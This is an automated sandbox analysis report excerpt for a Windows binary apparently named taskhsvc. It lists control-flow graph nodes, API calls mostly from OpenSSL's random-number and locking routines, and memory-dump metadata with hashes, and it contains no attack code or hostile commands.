6ced708b GetTickCount RAND_add 129610 6ced70b9 GlobalMemoryStatus RAND_add GetCurrentProcessId RAND_add 129606->129610 129607 6ced7280 QueryPerformanceCounter 129608 6ced7420 RAND_add 129607->129608 129607->129645 129608->129610 129608->129645 129609 6ced71cf GetVersion 129612 6ced71d5 GetVersion 129609->129612 129655 6ced71e1 129609->129655 129613 6ced782f __stack_chk_fail 129610->129613 129614 6ced7129 129610->129614 129611 6ced71a0 RAND_add 129611->129645 129612->129645 129612->129655 129619 6ced7873 129613->129619 129615 6ced6d72 FreeLibrary 129615->129599 129616 6ced7692 RAND_add 129616->129645 129617 6ced720d RAND_add FreeLibrary 129617->129645 129618 6ced73f0 RAND_add 129618->129645 129620 6ced79ba QueryPerformanceCounter 129619->129620 129621 6ced7892 GetTickCount RAND_add 129619->129621 129630 6ced7940 129619->129630 129626 6ced79cc 129620->129626 129627 6ced7a10 RAND_add 129620->129627 129623 6ced78c0 RAND_add RAND_add RAND_add RAND_status 129621->129623 129622 6ced7740 RAND_add 129622->129655 129628 6ced7939 129623->129628 129629 6ced7a7b __stack_chk_fail RAND_poll GetVersion 129623->129629 129624 6ced7470 RAND_add 129624->129645 129625 6ced7665 RAND_add 129625->129616 129626->129621 129627->129623 129627->129626 129633 6ced7aa7 OPENSSL_isservice 129629->129633 129634 6ced7ad0 6 API calls 129629->129634 129630->129627 129631 6ced7779 GetTickCount 129631->129645 129631->129655 129632 6ced75f1 GetTickCount 129632->129655 129633->129634 129636 6ced7ab0 129633->129636 129637 6ced7bd4 129634->129637 129638 6ced7c86 DeleteObject ReleaseDC 129634->129638 129635 6ced76e1 RAND_add 129635->129645 129640 6ced7cad __stack_chk_fail 129636->129640 129641 6ced7ac3 129636->129641 129642 6ced7c7e CRYPTO_free 129637->129642 129646 6ced7bf0 GetDIBits EVP_sha1 EVP_Digest RAND_add 129637->129646 129638->129640 129639 6ced6f3d CreateToolhelp32Snapshot 129639->129605 129639->129645 129647 6ced7d1d 129640->129647 129648 6ced7d23 __stack_chk_fail 129640->129648 129642->129638 129643 6ced77a0 RAND_add 129643->129655 129644 6ced75db GetTickCount 129644->129632 129645->129595 129645->129597 129645->129599 129645->129601 129645->129602 129645->129603 129645->129604 129645->129605 129645->129606 129645->129607 129645->129609 129645->129611 129645->129615 129645->129616 129645->129617 129645->129618 129645->129622 129645->129624 129645->129625 129645->129635 129645->129639 129645->129643 129649 6ced771a GetTickCount 129645->129649 129650 6ced77f0 GetTickCount Heap32ListFirst 129645->129650 129653 6ced7820 FindCloseChangeNotification 129645->129653 129654 6ced74b0 RAND_add Heap32First 129645->129654 129656 6ced7630 RAND_add 129645->129656 129659 6ced7540 Heap32ListNext 129645->129659 129661 6ced757d GetTickCount Process32First 129645->129661 129662 6ced7020 RAND_add 129645->129662 129665 6ced7513 RAND_add Heap32Next 129645->129665 129666 6ced7566 GetTickCount 129645->129666 129669 6ced75bf GetTickCount 129645->129669 129646->129642 129646->129646 129651 6ced7d5a __stack_chk_fail CRYPTO_lock CRYPTO_lock 129648->129651 129652 6ced7d56 129648->129652 129649->129645 129649->129655 129650->129645 129650->129654 129657 6ced7dd8 __stack_chk_fail CRYPTO_lock 129651->129657 129658 6ced7dd1 129651->129658 129653->129605 129654->129645 129654->129659 129655->129618 129655->129631 129655->129632 129655->129643 129655->129644 129655->129645 129660 6ced77d6 GetTickCount 129655->129660 129656->129645 129663 6ced7e2d CRYPTO_lock 129657->129663 129664 6ced7e1b lh_free 129657->129664 129659->129645 129660->129645 129660->129655 129661->129645 129662->129645 129667 6ced7e5d 129663->129667 129668 6ced7e61 __stack_chk_fail 129663->129668 129664->129663 129665->129645 129665->129659 129666->129654 129666->129661 129670 6ced7ebd 129668->129670 129671 6ced7e87 129668->129671 129669->129655 129673 6ced7ec9 129670->129673 129674 6ced7ed8 __stack_chk_fail CRYPTO_lock 129670->129674 129671->129670 129672 6ced7e8d CRYPTO_add_lock 129671->129672 129672->129670 129675 6ced7f60 129674->129675 129676 6ced7f22 129674->129676 129677 6ced7f28 CRYPTO_lock 129675->129677 129678 6ced7f64 CRYPTO_push_info_ lh_new CRYPTO_pop_info 129675->129678 129676->129677 129679 6ced7fae __stack_chk_fail CRYPTO_lock 129677->129679 129680 6ced7f5a 129677->129680 129678->129676 129678->129677 129681 6ced8040 129679->129681 129682 6ced8002 CRYPTO_lock 129679->129682 129681->129682 129685 6ced8044 CRYPTO_push_info_ lh_new CRYPTO_pop_info 129681->129685 129683 6ced8089 __stack_chk_fail 129682->129683 129684 6ced8034 129682->129684 129686 6ced80c3 __stack_chk_fail CRYPTO_THREADID_hash 129683->129686 129687 6ced80b3 129683->129687 129685->129682 129688 6ced80fe 129686->129688 129689 6ced8102 __stack_chk_fail CRYPTO_THREADID_current 129686->129689 129687->129686 129690 6ced813a 129689->129690 129691 6ced8160 CRYPTO_lock 129689->129691 129694 6ced81cc __stack_chk_fail 129690->129694 129695 6ced814f 129690->129695 129692 6ced818d CRYPTO_lock 129691->129692 129693 6ced81c0 129691->129693 129692->129690 129693->129692 129696 6ced81e0 129694->129696 129697 6ced8201 129696->129697 129698 6ced8290 CRYPTO_lock 129696->129698 129701 6ced8214 CRYPTO_lock lh_retrieve CRYPTO_lock 129697->129701 129702 6ced826c 129697->129702 129699 6ced82bd CRYPTO_lock 129698->129699 129700 6ced8300 129698->129700 129699->129697 129700->129699 129701->129702 129703 6ced830c __stack_chk_fail 129702->129703 129704 6ced827c 129702->129704 129705 6ced8320 129703->129705 129706 6ced8341 129705->129706 129707 6ced83d0 CRYPTO_lock 129705->129707 129710 6ced8354 CRYPTO_lock lh_insert CRYPTO_lock 129706->129710 129711 6ced83ac 129706->129711 129708 6ced83fd CRYPTO_lock 129707->129708 129709 6ced8440 129707->129709 129708->129706 129709->129708 129710->129711 129712 6ced844c __stack_chk_fail 129711->129712 129713 6ced83bc 129711->129713 129714 6ced8460 129712->129714 129715 6ced8481 129714->129715 129716 6ced8510 CRYPTO_lock 129714->129716 129719 6ced8494 CRYPTO_lock lh_delete CRYPTO_lock 129715->129719 129720 6ced84ec 129715->129720 129717 6ced853d CRYPTO_lock 129716->129717 129718 6ced8580 129716->129718 129717->129715 129718->129717 129719->129720 129721 6ced858c __stack_chk_fail 129720->129721 129722 6ced84fc 129720->129722 129723 6ced85a0 129721->129723 129724 6ced8660 CRYPTO_lock 129723->129724 129725 6ced85c0 129723->129725 129726 6ced868d CRYPTO_lock 129724->129726 129727 6ced86d0 129724->129727 129728 6ced85d6 CRYPTO_lock lh_retrieve CRYPTO_lock 129725->129728 129729 6ced8640 129725->129729 129726->129725 129727->129726 129728->129729 129730 6ced86dc __stack_chk_fail 129729->129730 129731 6ced8652 129729->129731 129732 6ced86f0 129730->129732 129733 6ced87b0 CRYPTO_lock 129732->129733 129734 6ced8710 129732->129734 129735 6ced87dd CRYPTO_lock 129733->129735 129736 6ced8820 129733->129736 129737 6ced8726 CRYPTO_lock lh_insert CRYPTO_lock 129734->129737 129738 6ced8790 129734->129738 129735->129734 129736->129735 129737->129738 129739 6ced882c __stack_chk_fail 129738->129739 129740 6ced87a2 129738->129740 129741 6ced8840 129739->129741 129742 6ced8d70 CRYPTO_lock 129741->129742 129743 6ced8860 129741->129743 129744 6ced8d9d CRYPTO_lock 129742->129744 129745 6ced8dd0 129742->129745 129746 6ced8b0c 129743->129746 129747 6ced8876 CRYPTO_lock lh_delete 129743->129747 129744->129745 129745->129744 129748 6ced8ddc __stack_chk_fail 129746->129748 129749 6ced8b1c 129746->129749 129750 6ced88b9 CRYPTO_lock 129747->129750 129751 6ced8d30 129747->129751 129802 6ced8df0 129748->129802 129753 6ced88ec 129750->129753 129751->129750 129752 6ced8d3d lh_num_items 129751->129752 129752->129750 129755 6ced8d4d lh_free 129752->129755 129753->129746 129757 6ced890b 129753->129757 129758 6ced8b30 CRYPTO_free 129753->129758 129754 6ced90c0 CRYPTO_lock 129756 6ced90f2 CRYPTO_lock 129754->129756 129754->129802 129755->129750 129760 6ced9120 CRYPTO_lock 129756->129760 129759 6ced892c 129757->129759 129761 6ced8b50 CRYPTO_free 129757->129761 129758->129757 129762 6ced894d 129759->129762 129765 6ced8b70 CRYPTO_free 129759->129765 129764 6ced9152 CRYPTO_lock 129760->129764 129760->129802 129761->129759 129766 6ced896e 129762->129766 129767 6ced8b90 CRYPTO_free 129762->129767 129763 6ced91c9 CRYPTO_lock 129763->129802 129769 6ced9190 CRYPTO_lock 129764->129769 129765->129762 129768 6ced898f 129766->129768 129770 6ced8bb0 CRYPTO_free 129766->129770 129767->129766 129771 6ced89b0 129768->129771 129772 6ced8bd0 CRYPTO_free 129768->129772 129769->129763 129769->129802 129770->129768 129773 6ced89d1 129771->129773 129774 6ced8bf0 CRYPTO_free 129771->129774 129772->129771 129775 6ced89f2 129773->129775 129776 6ced8c10 CRYPTO_free 129773->129776 129774->129773 129777 6ced8a13 129775->129777 129778 6ced8c30 CRYPTO_free 129775->129778 129776->129775 129779 6ced8a34 129777->129779 129781 6ced8c50 CRYPTO_free 129777->129781 129778->129777 129782 6ced8a55 129779->129782 129784 6ced8c70 CRYPTO_free 129779->129784 129780 6ced9080 BIO_snprintf 129780->129754 129781->129779 129785 6ced8a76 129782->129785 129787 6ced8c90 CRYPTO_free 129782->129787 129783 6ced9000 BIO_snprintf 129783->129802 129784->129782 129788 6ced8a97 129785->129788 129790 6ced8cb0 CRYPTO_free 129785->129790 129786 6ced9040 BIO_snprintf 129786->129802 129787->129785 129791 6ced8ab8 129788->129791 129796 6ced8cd0 CRYPTO_free 129788->129796 129789 6ced8ee5 BIO_snprintf strlen 129792 6ced8f1c 129789->129792 129789->129802 129790->129788 129797 6ced8ad9 129791->129797 129798 6ced8cf0 CRYPTO_free 129791->129798 129793 6ced92af __stack_chk_fail 129792->129793 129794 6ced8f2f 129792->129794 129795 6ced8f45 strchr 129795->129802 129796->129791 129799 6ced8afa CRYPTO_free 129797->129799 129800 6ced8d10 CRYPTO_free 129797->129800 129798->129797 129799->129746 129800->129799 129801 6ced8f6c strchr 129801->129802 129802->129754 129802->129760 129802->129763 129802->129769 129802->129780 129802->129783 129802->129786 129802->129789 129802->129792 129802->129795 129802->129801 129803 6ced8f92 strchr 129802->129803 129803->129802 129804 6ced8fab strchr 129803->129804 129804->129792 129806 6cd612f9 129807 6cd61300 129806->129807 129824 6cd72870 129807->129824 129809 6cd61305 129810 6cd612a4 129809->129810 129811 6cd61318 129809->129811 129814 6cd612e3 129810->129814 129817 6cd612b7 129810->129817 129843 6cd61040 7 API calls 129811->129843 129813 6cd6131d 129813->129814 129815 6cd61360 129813->129815 129816 6cd6133d 129813->129816 129815->129817 129845 6cd72b50 _lock __dllonexit _unlock _onexit 129815->129845 129816->129814 129844 6cd61040 7 API calls 129816->129844 129817->129810 129842 6cd61040 7 API calls 129817->129842 129821 6cd612dc 129821->129814 129822 6cd6136a 129822->129814 129846 6cd61040 7 API calls 129822->129846 129825 6cd72879 129824->129825 129827 6cd72880 129824->129827 129825->129809 129826 6cd72973 129826->129809 129827->129826 129829 6cd7297b 129827->129829 129835 6cd7290e 129827->129835 129828 6cd72b0b 129830 6cd726d0 13 API calls 129828->129830 129829->129826 129837 6cd729b7 129829->129837 129875 6cd72730 129829->129875 129832 6cd72b1b 129830->129832 129832->129809 129833 6cd72730 13 API calls 129833->129835 129834 6cd72963 129847 6cd726d0 fwrite vfprintf abort 129834->129847 129835->129826 129835->129828 129835->129833 129835->129834 129835->129837 129836 6cd729e6 VirtualQuery 129839 6cd72ae6 129836->129839 129840 6cd72a0c VirtualProtect 129836->129840 129837->129826 129837->129836 129841 6cd726d0 13 API calls 129839->129841 129840->129837 129841->129828 129842->129821 129843->129813 129844->129821 129845->129822 129846->129817 129851 6cd72730 129847->129851 129848 6cd7285a 129849 6cd726d0 5 API calls 129848->129849 129860 6cd7286a 129849->129860 129850 6cd7280f 129850->129826 129851->129848 129851->129850 129852 6cd7279e VirtualQuery 129851->129852 129853 6cd727cd 129852->129853 129854 6cd7283a 129852->129854 129853->129850 129856 6cd727e1 VirtualProtect 129853->129856 129855 6cd726d0 5 API calls 129854->129855 129855->129848 129856->129850 129857 6cd72824 GetLastError 129856->129857 129859 6cd726d0 5 API calls 129857->129859 129858 6cd72879 129858->129826 129859->129854 129860->129858 129862 6cd7297b 129860->129862 129865 6cd7290e 129860->129865 129861 6cd72b0b 129863 6cd726d0 5 API calls 129861->129863 129862->129858 129864 6cd72730 5 API calls 129862->129864 129867 6cd729b7 129862->129867 129866 6cd72b1b 129863->129866 129864->129862 129865->129858 129865->129861 129865->129867 129868 6cd72730 VirtualQuery VirtualProtect GetLastError VirtualQuery VirtualProtect 129865->129868 129869 6cd72963 129865->129869 129866->129826 129867->129858 129870 6cd729e6 VirtualQuery 129867->129870 129868->129865 129871 6cd726d0 5 API calls 129869->129871 129872 6cd72ae6 129870->129872 129873 6cd72a0c VirtualProtect 129870->129873 129871->129858 129874 6cd726d0 5 API calls 129872->129874 129873->129867 129874->129861 129879 6cd72744 129875->129879 129876 6cd7285a 129877 6cd726d0 8 API calls 129876->129877 129888 6cd7286a 129877->129888 129878 6cd7280f 129878->129829 129879->129876 129879->129878 129880 6cd7279e VirtualQuery 129879->129880 129881 6cd727cd 129880->129881 129882 6cd7283a 129880->129882 129881->129878 129884 6cd727e1 VirtualProtect 129881->129884 129883 6cd726d0 8 API calls 129882->129883 129883->129876 129884->129878 129885 6cd72824 GetLastError 129884->129885 129887 6cd726d0 8 API calls 129885->129887 129886 6cd72879 129886->129829 129887->129882 129888->129886 129893 6cd7297b 129888->129893 129894 6cd7290e 129888->129894 129889 6cd72b0b 129890 6cd726d0 8 API calls 129889->129890 129892 6cd72b1b 129890->129892 129891 6cd72730 8 API calls 129891->129893 129892->129829 129893->129886 129893->129891 129901 6cd729b7 129893->129901 129894->129886 129894->129889 129895 6cd72963 129894->129895 129898 6cd72730 8 API calls 129894->129898 129894->129901 129897 6cd726d0 8 API calls 129895->129897 129896 6cd729e6 VirtualQuery 129899 6cd72ae6 129896->129899 129900 6cd72a0c VirtualProtect 129896->129900 129897->129886 129898->129894 129902 6cd726d0 8 API calls 129899->129902 129900->129901 129901->129886 129901->129896 129902->129889

                                                            Executed Functions

                                                            Function 6CED6BA0 Relevance: 325.5, APIs: 182, Strings: 3, Instructions: 1792libraryloaderprocessCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$D_add$Library$Free$Load$CountCreateCurrentGlobalL_isserviceMemoryProcessSnapshotStatisticsStatusTickToolhelp32Version
                                                            • String ID: $$($@
                                                            • API String ID: 392320324-1817833950
                                                            • Opcode ID: b9bff13b2684472fafcd16aa1902fdd977665b61fe6e780d124995735568fba1
                                                            • Instruction ID: 6ff176d8f8525a200571418aa8c263d566b921d0a5bd15032eacc60f8450eccf
                                                            • Opcode Fuzzy Hash: b9bff13b2684472fafcd16aa1902fdd977665b61fe6e780d124995735568fba1
                                                            • Instruction Fuzzy Hash: 1D03F2B06093019FDB00EF25C58475BBBF4AF85348F62992DE8988B744D779E44ACF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE23110 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1131 6ce23110-6ce23130 1132 6ce231e0-6ce231e2 1131->1132 1133 6ce23136-6ce2313e 1131->1133 1134 6ce231ac-6ce231b6 1132->1134 1135 6ce231c0-6ce231ca 1133->1135 1136 6ce23144-6ce2314b 1133->1136 1137 6ce231e4-6ce231e9 __stack_chk_fail 1134->1137 1138 6ce231b8-6ce231bf 1134->1138 1135->1136 1139 6ce23174-6ce2318f 1136->1139 1140 6ce2314d-6ce23155 1136->1140 1139->1134 1144 6ce23191-6ce231aa 1139->1144 1141 6ce231d0-6ce231da 1140->1141 1142 6ce23157-6ce2316b 1140->1142 1141->1142 1142->1139 1144->1134
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f6f884a51c5bc20bd4180bf6c4b7d625bb0174d72e750c62089be1fe84ee7c7
                                                            • Instruction ID: 09b22501809d48c9dd638db9c4902d52344e174a05b5ca8df41bfc43a9aaed01
                                                            • Opcode Fuzzy Hash: 1f6f884a51c5bc20bd4180bf6c4b7d625bb0174d72e750c62089be1fe84ee7c7
                                                            • Instruction Fuzzy Hash: 9421D8B1A183019BDB40DF5AC58070AFBF8BF8A748F15891EE59887710D7799504CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF94A80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 545 6cf94a80-6cf94aee fwrite vfprintf abort 547 6cf94bcd-6cf94bcf 545->547 548 6cf94af4-6cf94aff 545->548 549 6cf94b1e-6cf94b2c call 6cf95440 547->549 550 6cf94b00-6cf94b04 548->550 556 6cf94c0a-6cf94c27 call 6cf94a80 549->556 557 6cf94b32-6cf94b7b call 6cf95570 VirtualQuery 549->557 551 6cf94b14-6cf94b1c 550->551 552 6cf94b06-6cf94b0e 550->552 551->549 551->550 552->551 554 6cf94bc6-6cf94bcc 552->554 567 6cf94c29 556->567 568 6cf94c30-6cf94c82 call 6cf954c0 call 6cf956e0 556->568 562 6cf94bea-6cf94c01 557->562 563 6cf94b7d-6cf94b87 557->563 562->556 569 6cf94c05 call 6cf94a80 562->569 565 6cf94b89-6cf94b8f 563->565 566 6cf94bbf 563->566 565->566 570 6cf94b91-6cf94bbd VirtualProtect 565->570 566->554 577 6cf94c88-6cf94c8b 568->577 578 6cf94d23-6cf94d2a 568->578 569->556 570->566 572 6cf94bd4-6cf94be5 GetLastError call 6cf94a80 570->572 572->562 579 6cf94c91-6cf94c98 577->579 580 6cf94df0 577->580 582 6cf94d2b 579->582 583 6cf94c9e-6cf94ca5 579->583 581 6cf94df5-6cf94df9 580->581 584 6cf94dff-6cf94e04 581->584 585 6cf94d30-6cf94d36 581->585 582->585 583->582 586 6cf94cab-6cf94cb8 583->586 588 6cf94e0a 584->588 589 6cf94cc3-6cf94cc9 584->589 585->578 590 6cf94d38-6cf94d39 585->590 586->581 587 6cf94cbe 586->587 587->589 588->585 591 6cf94ebb-6cf94ed9 call 6cf94a80 589->591 592 6cf94ccf-6cf94cd8 589->592 593 6cf94d40-6cf94d65 call 6cf94ae0 590->593 603 6cf94edb-6cf94ede 591->603 604 6cf94efa 591->604 592->578 594 6cf94cda-6cf94cfb 592->594 606 6cf94d67-6cf94d70 593->606 597 6cf94e0f-6cf94e3d call 6cf94ae0 594->597 598 6cf94d01-6cf94d04 594->598 618 6cf94e44-6cf94e4d 597->618 601 6cf94d0a-6cf94d0d 598->601 602 6cf94e7f-6cf94e94 call 6cf94ae0 598->602 610 6cf94e58-6cf94e7d call 6cf94ae0 601->610 611 6cf94d13-6cf94d1e call 6cf94a80 601->611 602->618 612 6cf94ee0-6cf94ef5 603->612 607 6cf94d7f-6cf94d94 606->607 608 6cf94d72 606->608 614 6cf94d74-6cf94d7d 607->614 615 6cf94d96-6cf94db6 VirtualQuery 607->615 608->578 610->618 611->578 626 6cf94ef7 612->626 614->578 614->607 621 6cf94dbc-6cf94de5 VirtualProtect 615->621 622 6cf94e96-6cf94eb6 call 6cf94a80 615->622 618->594 624 6cf94e53 618->624 621->614 622->591 624->606 626->604
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                            • String ID: @
                                                            • API String ID: 1503958624-2766056989
                                                            • Opcode ID: 3f88c96a29ca0b2e19edcf29d88686294dd5b413436edc3b77bd8d2a995bbd48
                                                            • Instruction ID: bfce08b0f5bb37409e7951b4c4d375de4b8d9058bb938f091079d1caf325ec70
                                                            • Opcode Fuzzy Hash: 3f88c96a29ca0b2e19edcf29d88686294dd5b413436edc3b77bd8d2a995bbd48
                                                            • Instruction Fuzzy Hash: 54414DB2A053018FEB00EF68D58574AFBF4FB56758F45891CE8A897B00E730E944CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CD726D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
